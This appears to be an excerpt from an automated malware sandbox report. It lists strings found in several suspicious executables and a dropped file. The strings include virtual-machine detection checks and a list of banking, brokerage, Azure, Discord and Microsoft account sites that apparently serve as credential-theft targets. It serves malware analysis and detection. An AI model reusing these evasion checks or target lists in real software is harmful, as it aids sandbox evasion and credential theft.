Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AAFBAKEC.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: AAFBAKEC.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Vindows 2012 Microsoft Hyper-V Server
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000008EC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: AAFBAKEC.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000008EC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: AAFBAKEC.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000008EC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: AAFBAKEC.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: AAFBAKEC.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: AFHDAKJKFC.exe, 00000008.00000002.2394575853.00000000007BB000.00000040.00000001.01000000.00000009.sdmp, explortu.exe, 0000000A.00000002.2412835457.000000000064B000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: AAFBAKEC.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: AAFBAKEC.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: AAFBAKEC.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AAFBAKEC.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001739000.00000004.00000020.00020000.00000000.sdmp, cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001C0E000.00000004.00000020.00020000.00000000.sdmp, cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: AAFBAKEC.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: AAFBAKEC.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: AAFBAKEC.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: AAFBAKEC.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: AAFBAKEC.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: AAFBAKEC.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: AAFBAKEC.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: AAFBAKEC.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BB4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: AAFBAKEC.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: AAFBAKEC.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001709000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: AAFBAKEC.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
